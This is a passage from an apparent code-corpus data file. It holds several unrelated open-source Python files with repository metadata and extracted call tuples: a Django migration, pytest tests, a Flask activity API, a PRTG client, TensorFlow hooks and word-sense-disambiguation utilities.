'Registry', ({(49, 28, 49, 37): '"""kwparam"""'}, {}), "('kwparam')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((59, 19, 59, 53), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((69, 19, 69, 60), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((163, 15, 163, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((164, 15, 164, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((173, 9, 173, 36), 'pytest.raises', 'pytest.raises', ({(173, 23, 
173, 35): 'RuntimeError'}, {}), '(RuntimeError)', False, 'import pytest\n'), ((226, 9, 226, 33), 'pytest.raises', 'pytest.raises', ({(226, 23, 226, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((227, 8, 227, 53), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((274, 9, 274, 33), 'pytest.raises', 'pytest.raises', ({(274, 23, 274, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((280, 9, 280, 33), 'pytest.raises', 'pytest.raises', ({(280, 23, 280, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((160, 11, 160, 21), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((176, 20, 176, 30), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((412, 13, 412, 42), 'pytest.raises', 'pytest.raises', ({(412, 27, 412, 41): 'AttributeError'}, {}), '(AttributeError)', False, 'import pytest\n'), ((422, 13, 422, 38), 'pytest.raises', 'pytest.raises', ({(422, 27, 422, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((430, 13, 430, 38), 'pytest.raises', 'pytest.raises', ({(430, 27, 430, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((434, 13, 434, 38), 'pytest.raises', 'pytest.raises', ({(434, 27, 434, 37): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n')] |
RomanMahar/personalsite | home/migrations/0010_auto_20180206_1625.py | ad0c7880e0ccfe81ea53b8bad8e0d4fcf0c5830b | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-02-06 16:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('home', '0009_remove_homepagesection_sectiontitle'),
]
operations = [
migrations.CreateModel(
name='SnippetClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=255)),
('page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='snippy', to='wagtailcore.Page')),
],
),
migrations.AlterField(
model_name='homepagesection',
name='sectionClassName',
field=models.SlugField(default='homepage-section', help_text='no spaces', max_length=100),
),
migrations.AddField(
model_name='homepagesection',
name='advert',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='home.SnippetClass'),
),
]
| [((28, 18, 28, 101), 'django.db.models.SlugField', 'models.SlugField', (), '', False, 'from django.db import migrations, models\n'), ((33, 18, 33, 146), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((20, 23, 20, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((21, 25, 21, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((22, 25, 22, 156), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')] |
anniyanvr/nesta | nesta/packages/misc_utils/tests/test_guess_sql_type.py | 4b3ae79922cebde0ad33e08ac4c40b9a10e8e7c3 | import pytest
from nesta.packages.misc_utils.guess_sql_type import guess_sql_type
@pytest.fixture
def int_data():
return [1,2,4,False]
@pytest.fixture
def text_data():
return ['a', True, 2,
('A very long sentence A very long sentence A '
'very long sentence A very long sentence'), 'd']
@pytest.fixture
def float_data():
return [1,2.3,True,None]
@pytest.fixture
def bool_data():
return [True,False,None]
def test_guess_sql_type_int(int_data):
assert guess_sql_type(int_data) == 'INTEGER'
def test_guess_sql_type_float(float_data):
assert guess_sql_type(float_data) == 'FLOAT'
def test_guess_sql_type_bool(bool_data):
assert guess_sql_type(bool_data) == 'BOOLEAN'
def test_guess_sql_type_str(text_data):
assert guess_sql_type(text_data, text_len=10) == 'TEXT'
assert guess_sql_type(text_data, text_len=100).startswith('VARCHAR(')
| [((24, 11, 24, 35), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(24, 26, 24, 34): 'int_data'}, {}), '(int_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((27, 11, 27, 37), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(27, 26, 27, 36): 'float_data'}, {}), '(float_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((30, 11, 30, 36), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', ({(30, 26, 30, 35): 'bool_data'}, {}), '(bool_data)', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((33, 11, 33, 49), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', (), '', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n'), ((34, 11, 34, 50), 'nesta.packages.misc_utils.guess_sql_type.guess_sql_type', 'guess_sql_type', (), '', False, 'from nesta.packages.misc_utils.guess_sql_type import guess_sql_type\n')] |
DXCChina/pms | api/controller/activity.py | c779a69f25fb08101593c6ff0451debc0abce6e4 | # -*- coding: utf-8 -*-
'''Activity management API'''
from flask import request
from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User
from model.role import identity
from flask_jwt_extended import (fresh_jwt_required)
def demand_activity_add(activity_id, data):
    '''Add demands to an activity'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if not demand.activityId:
demand.activityId = activity_id
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_del(activity_id, data):
    '''Remove demands from an activity'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.activityId = None
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_done(activity_id, data):
    '''Update activity demands (mark them as done)'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.status = 1
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
@fresh_jwt_required
@identity.check_permission("create", 'task')
def activity_add():
    '''Create a project activity'''
data = request.json
if 'memberId' in data and data['memberId']:
data['status'] = 'dev-ing'
with database.atomic():
activity_id = ActivityBase.create(**data).id
if 'memberId' in data and data['memberId']:
for member_id in data['memberId']:
role = ProjectMember.get(
ProjectMember.projectId == data['projectId'],
ProjectMember.memberId == member_id).role
ActivityMember.create(**{
'activityId': activity_id,
'memberId': member_id,
'role': role
})
demand_activity_add(activity_id, data['demand'])
return {"msg": 'ok'}
@fresh_jwt_required
@identity.check_permission("update", 'task')
def activity_update():
    '''Update a project activity'''
data = request.json
activity_id = data.pop('activityId')
with database.atomic():
if 'del_memberId' in data:
for member_id in data.pop('del_memberId'):
ActivityMember.delete().where(
(ActivityMember.activityId == activity_id) &
(ActivityMember.memberId == member_id)).execute()
if 'memberId' in data:
            if 'status' not in data or not data['status']:
data['status'] = 'dev-ing'
for member_id in data.pop('memberId'):
ActivityMember.get_or_create(
activityId=activity_id,
memberId=member_id,
role=ProjectMember.get(
(ProjectMember.projectId == data['projectId'])
& (ProjectMember.memberId == member_id)).role)
if 'done_demand' in data:
demand_activity_done(activity_id, data.pop('done_demand'))
if 'demand' in data:
demand_activity_add(activity_id, data.pop('demand'))
if 'del_demand' in data:
demand_activity_del(activity_id, data.pop('del_demand'))
Activity.update(**data).where(Activity.id == activity_id).execute()
return {"msg": 'ok'}
@fresh_jwt_required
def activity_detail(activity_id):
    '''Query activity details
GET /api/activity/<int:activity_id>
'''
activity = Activity.findOne(Activity.id == activity_id)
activity['member'] = list(
ActivityMember.find(ActivityMember.role, User.username,
User.email, User.id).join(User)
.where(ActivityMember.activityId == activity_id))
activity['demand'] = list(
Demand.find().where(Demand.activityId == activity_id))
return activity
@fresh_jwt_required
def project_user(project_id):
    '''Query project members'''
return {
"data":
list(
ProjectMember.find(
ProjectMember.role,
User).join(User).where(ProjectMember.projectId == project_id))
}
| [((42, 1, 42, 44), 'model.role.identity.check_permission', 'identity.check_permission', ({(42, 27, 42, 35): '"""create"""', (42, 37, 42, 43): '"""task"""'}, {}), "('create', 'task')", False, 'from model.role import identity\n'), ((65, 1, 65, 44), 'model.role.identity.check_permission', 'identity.check_permission', ({(65, 27, 65, 35): '"""update"""', (65, 37, 65, 43): '"""task"""'}, {}), "('update', 'task')", False, 'from model.role import identity\n'), ((101, 15, 101, 59), 'model.db.Activity.findOne', 'Activity.findOne', ({(101, 32, 101, 58): 'Activity.id == activity_id'}, {}), '(Activity.id == activity_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((14, 17, 14, 51), 'model.db.Demand.get', 'Demand.get', ({(14, 28, 14, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((24, 17, 24, 51), 'model.db.Demand.get', 'Demand.get', ({(24, 28, 24, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((34, 17, 34, 51), 'model.db.Demand.get', 'Demand.get', ({(34, 28, 34, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((48, 9, 48, 26), 'model.db.database.atomic', 'database.atomic', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((70, 9, 70, 26), 'model.db.database.atomic', 'database.atomic', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((49, 22, 49, 49), 'model.db.ActivityBase.create', 'ActivityBase.create', ({}, {}), '(**data)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((55, 16, 59, 18), 'model.db.ActivityMember.create', 'ActivityMember.create', ({}, {}), "(**{'activityId': activity_id, 'memberId': member_id,\n 'role': role})", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((107, 8, 107, 21), 'model.db.Demand.find', 'Demand.find', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((52, 23, 54, 56), 'model.db.ProjectMember.get', 'ProjectMember.get', ({(53, 20, 53, 64): "(ProjectMember.projectId == data['projectId'])", (54, 20, 54, 55): '(ProjectMember.memberId == member_id)'}, {}), "(ProjectMember.projectId == data['projectId'], \n ProjectMember.memberId == member_id)", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((92, 8, 92, 31), 'model.db.Activity.update', 'Activity.update', ({}, {}), '(**data)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((103, 8, 104, 48), 'model.db.ActivityMember.find', 'ActivityMember.find', ({(103, 28, 103, 47): 'ActivityMember.role', (103, 49, 103, 62): 'User.username', (104, 28, 104, 38): 'User.email', (104, 40, 104, 47): 'User.id'}, {}), '(ActivityMember.role, User.username, User.email, User.id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((83, 25, 85, 
64), 'model.db.ProjectMember.get', 'ProjectMember.get', ({(84, 24, 85, 63): "((ProjectMember.projectId == data['projectId']) & (ProjectMember.memberId ==\n member_id))"}, {}), "((ProjectMember.projectId == data['projectId']) & (\n ProjectMember.memberId == member_id))", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((117, 12, 119, 21), 'model.db.ProjectMember.find', 'ProjectMember.find', ({(118, 16, 118, 34): 'ProjectMember.role', (119, 16, 119, 20): 'User'}, {}), '(ProjectMember.role, User)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((73, 16, 73, 39), 'model.db.ActivityMember.delete', 'ActivityMember.delete', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n')] |
Rage-ops/Leetcode-Solutions | math/9. Palindrome number.py | 48d4ecbb92a0bb7a7bb74a1445b593a67357ac02 | # Easy
# https://leetcode.com/problems/palindrome-number/
# Time Complexity: O(log(x) to base 10)
# Space Complexity: O(1)
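# Worked example (added for illustration): for x = 121 the loop below builds
# rev = 1, 12, 121, so rev == x and the answer is True; for x = 10 it builds
# rev = 0, 1, and 1 != 10 gives False. Negative inputs never enter the loop,
# leaving rev = 0, so they are reported as non-palindromes.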
class Solution:
def isPalindrome(self, x: int) -> bool:
temp = x
rev = 0
while temp > 0:
rev = rev * 10 + temp % 10
temp //= 10
return rev == x | [] |
Eyepea/panoramisk | panoramisk/__init__.py | c10725e358f5b802faa9df1d22de6710927735a0 | from .manager import Manager # NOQA
from .call_manager import CallManager # NOQA
from . import fast_agi # NOQA
| [] |
kevinschoon/prtg-py | prtg/client.py | 714e0750606e55b2cd4c7dff8770d94057fa932b | # -*- coding: utf-8 -*-
"""
Python library for Paessler's PRTG (http://www.paessler.com/)
"""
import logging
import xml.etree.ElementTree as Et
from urllib import request
from prtg.cache import Cache
from prtg.models import Sensor, Device, Status, PrtgObject
from prtg.exceptions import BadTarget, UnknownResponse
class Connection(object):
"""
PRTG Connection Object
"""
def __init__(self):
self.response = list()
@staticmethod
def _encode_response(response, tag):
out = list()
if any([tag == 'devices', tag =='sensors']):
for item in response.findall('item'):
i = dict()
for attrib in item:
i[attrib.tag] = attrib.text
if tag == 'devices':
out.append(Device(**i))
if tag == 'sensors':
out.append(Sensor(**i))
if tag == 'status':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(Status(**i))
if tag == 'prtg':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(PrtgObject(**i))
return out
def _process_response(self, response, expect_return=True):
"""
Process the response from the server.
"""
if expect_return:
try:
resp = Et.fromstring(response.read().decode('utf-8'))
except Et.ParseError as e:
raise UnknownResponse(e)
try:
ended = resp.attrib['listend'] # Catch KeyError and return finished
except KeyError:
ended = 1
return self._encode_response(resp, resp.tag), ended
def _build_request(self, query):
"""
Build the HTTP request.
"""
req, method = str(query), query.method
logging.debug('REQUEST: target={} method={}'.format(req, method))
return request.Request(url=req, method=method)
def get_request(self, query):
"""
Make a single HTTP request
"""
req = self._build_request(query)
logging.info('Making request: {}'.format(query))
resp, ended = self._process_response(request.urlopen(req))
self.response += resp
if not int(ended): # Recursively request until PRTG indicates "listend"
query.increment()
self.get_request(query)
class Client(object):
def __init__(self, endpoint, username, password):
self.endpoint = endpoint
self.username = username
self.password = password
self.cache = Cache()
@staticmethod
def query(query):
conn = Connection()
conn.get_request(query)
return conn.response
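    # Illustrative usage sketch (comments only, because Query from prtg.models is not
    # imported here and its exact signature is an assumption based on the commented-out
    # refresh() below):
    #
    #   client = Client('https://prtg.example.com', 'prtgadmin', 'passhash')
    #   devices = client.query(Query(target='table', endpoint=client.endpoint,
    #                                 username=client.username, password=client.password,
    #                                 content='devices', counter='devices'))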
"""
def refresh(self, query):
logging.info('Refreshing content: {}'.format(content))
devices = Query(target='table', endpoint=self.endpoint, username=self.username, password=self.password, content=content, counter=content)
self.connection.get_paginated_request(devices)
self.cache.write_content(devices.response)
def update(self, content, attribute, value, replace=False):
for index, obj in enumerate(content):
logging.debug('Updating object: {} with {}={}'.format(obj, attribute, value))
if attribute == 'tags':
tags = value.split(',')
if replace:
obj.tags = value.split(',')
else:
obj.tags += [x for x in tags if x not in obj.tags]
content[index] = obj
self.cache.write_content(content, force=True)
def content(self, content_name, parents=False, regex=None, attribute=None):
response = list()
for resp in self.cache.get_content(content_name):
if not all([regex, attribute]):
response.append(resp)
else:
if RegexMatch(resp, expression=regex, attribute=attribute):
response.append(resp)
if all([content_name == 'sensors', parents is True]):
logging.info('Searching for parents.. this may take a while')
p = list()
ids = set()
for index, child in enumerate(response):
parent = self.cache.get_object(str(child.parentid)) # Parent device.
if parent:
ids.add(str(parent.objid)) # Lookup unique parent ids.
else:
logging.warning('Unable to find sensor parent')
for parent in ids:
p.append(self.cache.get_object(parent))
response = p
return response
"""
| [((74, 15, 74, 54), 'urllib.request.Request', 'request.Request', (), '', False, 'from urllib import request\n'), ((95, 21, 95, 28), 'prtg.cache.Cache', 'Cache', ({}, {}), '()', False, 'from prtg.cache import Cache\n'), ((82, 45, 82, 65), 'urllib.request.urlopen', 'request.urlopen', ({(82, 61, 82, 64): 'req'}, {}), '(req)', False, 'from urllib import request\n'), ((40, 23, 40, 34), 'prtg.models.Status', 'Status', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((46, 23, 46, 38), 'prtg.models.PrtgObject', 'PrtgObject', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((60, 22, 60, 40), 'prtg.exceptions.UnknownResponse', 'UnknownResponse', ({(60, 38, 60, 39): 'e'}, {}), '(e)', False, 'from prtg.exceptions import BadTarget, UnknownResponse\n'), ((32, 31, 32, 42), 'prtg.models.Device', 'Device', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((34, 31, 34, 42), 'prtg.models.Sensor', 'Sensor', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n')] |
da-h/tf-boilerplate | template/misc.py | ab8409c935d3fcbed07bbefd1cb0049d45283222 | import tensorflow as tf
from tensorflow.python.training.session_run_hook import SessionRunArgs
# Define data loaders #####################################
# See https://gist.github.com/peterroelants/9956ec93a07ca4e9ba5bc415b014bcca
class IteratorInitializerHook(tf.train.SessionRunHook):
"""Hook to initialise data iterator after Session is created."""
def __init__(self, func=None):
super(IteratorInitializerHook, self).__init__()
self.iterator_initializer_func = func
def after_create_session(self, session, coord):
"""Initialise the iterator after the session has been created."""
self.iterator_initializer_func(session)
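# Illustrative wiring sketch (comments only; `features` and its placeholder are
# assumptions). Following the gist referenced above, the input_fn captures the iterator
# initializer so this hook can run it once the session has been created:
#
#   iterator_initializer_hook = IteratorInitializerHook()
#
#   def input_fn():
#       features_placeholder = tf.placeholder(features.dtype, features.shape)
#       dataset = tf.data.Dataset.from_tensor_slices(features_placeholder)
#       iterator = dataset.make_initializable_iterator()
#       iterator_initializer_hook.iterator_initializer_func = lambda sess: sess.run(
#           iterator.initializer, feed_dict={features_placeholder: features})
#       return iterator.get_next()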
# redefine summarysaverhook (for more accurate saving)
class CustomSummarySaverHook(tf.train.SummarySaverHook):
"""Saves summaries every N steps."""
def __init__(self,save_steps,*args,**kwargs):
super(CustomSummarySaverHook, self).__init__(*args,save_steps=save_steps,**kwargs)
def begin(self):
super().begin()
self._timer.reset()
self._iter_count = 0
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = ((self._iter_count + 1) % self.save_steps == 0)
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._iter_count += 1
class OneTimeSummarySaverHook(tf.train.SummarySaverHook):
"""One-Time SummarySaver
    Saves the requested summaries only once, on the first run step.
E.g. can be used for saving the source code as text.
"""
def __init__(self, output_dir=None, summary_writer=None, scaffold=None, summary_op=None):
self._summary_op = summary_op
self._summary_writer = summary_writer
self._output_dir = output_dir
self._scaffold = scaffold
class emptytimer():
def update_last_triggered_step(*args,**kwargs):
pass
self._timer = emptytimer()
def begin(self):
super().begin()
self._done = False
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = not self._done
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._done = True
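# Illustrative usage sketch (comments only; `logdir` is an assumption): a summary op
# registered through this hook is written exactly once, e.g. to archive the launching
# script next to the event files, while CustomSummarySaverHook covers periodic summaries.
#
#   source_op = tf.summary.text("source", tf.constant(open(__file__).read()))
#   hooks = [OneTimeSummarySaverHook(output_dir=logdir, summary_op=source_op),
#            CustomSummarySaverHook(100, output_dir=logdir,
#                                   summary_op=tf.summary.merge_all())]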
def ExperimentTemplate() -> str:
"""A template with Markdown syntax.
:return: str with Markdown template
"""
return """
Experiment
==========
Any [markdown code](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) can be used to describe this experiment.
For instance, you can find the automatically generated used settings of this run below.
Current Settings
----------------
| Argument | Value |
| -------- | ----- |
"""
| [((38, 15, 38, 39), 'tensorflow.python.training.session_run_hook.SessionRunArgs', 'SessionRunArgs', ({(38, 30, 38, 38): 'requests'}, {}), '(requests)', False, 'from tensorflow.python.training.session_run_hook import SessionRunArgs\n'), ((75, 15, 75, 39), 'tensorflow.python.training.session_run_hook.SessionRunArgs', 'SessionRunArgs', ({(75, 30, 75, 38): 'requests'}, {}), '(requests)', False, 'from tensorflow.python.training.session_run_hook import SessionRunArgs\n')] |
uibcdf/pyunitwizard | pyunitwizard/_private_tools/parsers.py | 54cdce7369e1f2a3771a1f05a4a6ba1d7610a5e7 | parsers = ['openmm.unit', 'pint', 'unyt']
def digest_parser(parser: str) -> str:
""" Check if parser is correct."""
if parser is not None:
if parser.lower() in parsers:
return parser.lower()
else:
            raise ValueError(f"Unknown parser: {parser}. Supported parsers: {parsers}")
else:
from pyunitwizard.kernel import default_parser
return default_parser
| [] |
bartonlin/MWSD | metric_wsd/utils/data_utils.py | 70ad446ee7f00a11988acb290270e32d8e6af925 | '''
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
Code taken from: https://github.com/facebookresearch/wsd-biencoders/blob/master/wsd_models/util.py
'''
import os
import re
import torch
import subprocess
from transformers import *
import random
pos_converter = {'NOUN':'n', 'PROPN':'n', 'VERB':'v', 'AUX':'v', 'ADJ':'a', 'ADV':'r'}
def generate_key(lemma, pos):
if pos in pos_converter.keys():
pos = pos_converter[pos]
key = '{}+{}'.format(lemma, pos)
return key
def load_pretrained_model(name):
if name == 'roberta-base':
model = RobertaModel.from_pretrained('roberta-base')
hdim = 768
elif name == 'roberta-large':
model = RobertaModel.from_pretrained('roberta-large')
hdim = 1024
elif name == 'bert-large':
model = BertModel.from_pretrained('bert-large-uncased')
hdim = 1024
else: #bert base
model = BertModel.from_pretrained('bert-base-uncased')
hdim = 768
return model, hdim
def load_tokenizer(name):
if name == 'roberta-base':
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
elif name == 'roberta-large':
tokenizer = RobertaTokenizer.from_pretrained('roberta-large')
elif name == 'bert-large':
tokenizer = BertTokenizer.from_pretrained('bert-large-uncased')
else: #bert base
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
return tokenizer
def load_wn_senses(path):
wn_senses = {}
with open(path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split('\t')
lemma = line[0]
pos = line[1]
senses = line[2:]
key = generate_key(lemma, pos)
wn_senses[key] = senses
return wn_senses
def get_label_space(data):
#get set of labels from dataset
labels = set()
for sent in data:
for _, _, _, _, label in sent:
if label != -1:
labels.add(label)
labels = list(labels)
labels.sort()
labels.append('n/a')
label_map = {}
for sent in data:
for _, lemma, pos, _, label in sent:
if label != -1:
key = generate_key(lemma, pos)
label_idx = labels.index(label)
if key not in label_map: label_map[key] = set()
label_map[key].add(label_idx)
return labels, label_map
def process_encoder_outputs(output, mask, as_tensor=False):
combined_outputs = []
position = -1
avg_arr = []
for idx, rep in zip(mask, torch.split(output, 1, dim=0)):
#ignore unlabeled words
if idx == -1: continue
#average representations for units in same example
elif position < idx:
position=idx
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
avg_arr = [rep]
else:
assert position == idx
avg_arr.append(rep)
#get last example from avg_arr
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
if as_tensor: return torch.cat(combined_outputs, dim=0)
else: return combined_outputs
#run WSD Evaluation Framework scorer within python
def evaluate_output(scorer_path, gold_filepath, out_filepath):
eval_cmd = ['java','-cp', scorer_path, 'Scorer', gold_filepath, out_filepath]
output = subprocess.Popen(eval_cmd, stdout=subprocess.PIPE ).communicate()[0]
output = [x.decode("utf-8") for x in output.splitlines()]
p,r,f1 = [float(output[i].split('=')[-1].strip()[:-1]) for i in range(3)]
return p, r, f1
def load_data(datapath, name):
text_path = os.path.join(datapath, '{}.data.xml'.format(name))
gold_path = os.path.join(datapath, '{}.gold.key.txt'.format(name))
#load gold labels
gold_labels = {}
with open(gold_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split(' ')
instance = line[0]
#this means we are ignoring other senses if labeled with more than one
#(happens at least in SemCor data)
key = line[1]
gold_labels[instance] = key
#load train examples + annotate sense instances with gold labels
sentences = []
s = []
with open(text_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip()
if line == '</sentence>':
sentences.append(s)
s=[]
elif line.startswith('<instance') or line.startswith('<wf'):
word = re.search('>(.+?)<', line).group(1)
lemma = re.search('lemma="(.+?)"', line).group(1)
pos = re.search('pos="(.+?)"', line).group(1)
#clean up data
word = re.sub(''', '\'', word)
lemma = re.sub(''', '\'', lemma)
sense_inst = -1
sense_label = -1
if line.startswith('<instance'):
sense_inst = re.search('instance id="(.+?)"', line).group(1)
#annotate sense instance with gold label
sense_label = gold_labels[sense_inst]
s.append((word, lemma, pos, sense_inst, sense_label))
return sentences
#normalize the ids list and masks (pad or truncate) to the requested max length
def normalize_length(ids, attn_mask, o_mask, max_len, pad_id):
if max_len == -1:
return ids, attn_mask, o_mask
else:
if len(ids) < max_len:
while len(ids) < max_len:
ids.append(torch.tensor([[pad_id]]))
attn_mask.append(0)
o_mask.append(-1)
else:
ids = ids[:max_len-1]+[ids[-1]]
attn_mask = attn_mask[:max_len]
o_mask = o_mask[:max_len]
assert len(ids) == max_len
assert len(attn_mask) == max_len
assert len(o_mask) == max_len
return ids, attn_mask, o_mask
#filters down training dataset to (up to) k examples per sense
#for few-shot learning of the model
def filter_k_examples(data, k):
#shuffle data so we don't only get examples for (common) senses from beginning
random.shuffle(data)
#track number of times sense from data is used
sense_dict = {}
#store filtered data
filtered_data = []
example_count = 0
for sent in data:
filtered_sent = []
for form, lemma, pos, inst, sense in sent:
#treat unlabeled words normally
if sense == -1:
x = (form, lemma, pos, inst, sense)
elif sense in sense_dict:
if sense_dict[sense] < k:
#increment sense count and add example to filtered data
sense_dict[sense] += 1
x = (form, lemma, pos, inst, sense)
example_count += 1
else: #if the data already has k examples of this sense
#add example with no instance or sense label to data
x = (form, lemma, pos, -1, -1)
else:
#add labeled example to filtered data and sense dict
sense_dict[sense] = 1
x = (form, lemma, pos, inst, sense)
example_count += 1
filtered_sent.append(x)
filtered_data.append(filtered_sent)
print("k={}, training on {} sense examples...".format(k, example_count))
return filtered_data
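#Illustrative usage (added; the SemCor paths follow the WSD Evaluation Framework layout
#and are assumptions, not part of this module):
#   train_data = load_data('WSD_Training_Corpora/SemCor', 'semcor')
#   few_shot_data = filter_k_examples(train_data, k=3)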
#EOF
| [((186, 1, 186, 21), 'random.shuffle', 'random.shuffle', ({(186, 16, 186, 20): 'data'}, {}), '(data)', False, 'import random\n'), ((93, 27, 93, 56), 'torch.split', 'torch.split', (), '', False, 'import torch\n'), ((106, 22, 106, 56), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((105, 57, 105, 85), 'torch.stack', 'torch.stack', (), '', False, 'import torch\n'), ((112, 10, 112, 61), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((148, 11, 148, 39), 're.sub', 're.sub', ({(148, 18, 148, 26): '"""'"""', (148, 28, 148, 32): '"""\'"""', (148, 34, 148, 38): 'word'}, {}), '(\''\', "\'", word)', False, 'import re\n'), ((149, 12, 149, 41), 're.sub', 're.sub', ({(149, 19, 149, 27): '"""'"""', (149, 29, 149, 33): '"""\'"""', (149, 35, 149, 40): 'lemma'}, {}), '(\''\', "\'", lemma)', False, 'import re\n'), ((168, 15, 168, 39), 'torch.tensor', 'torch.tensor', ({(168, 28, 168, 38): '[[pad_id]]'}, {}), '([[pad_id]])', False, 'import torch\n'), ((99, 59, 99, 87), 'torch.stack', 'torch.stack', (), '', False, 'import torch\n'), ((143, 11, 143, 37), 're.search', 're.search', ({(143, 21, 143, 30): '""">(.+?)<"""', (143, 32, 143, 36): 'line'}, {}), "('>(.+?)<', line)", 